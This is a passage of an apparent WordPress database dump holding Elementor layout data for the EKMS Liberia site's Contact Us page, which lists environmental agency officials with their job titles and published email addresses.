mn_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24450,3607,'_elementor_edit_mode','builder'),(24451,3607,'_elementor_template_type','wp-page'),(24452,3607,'_elementor_version','3.0.16'),(24453,3607,'_wp_page_template','default'),(24454,3607,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a 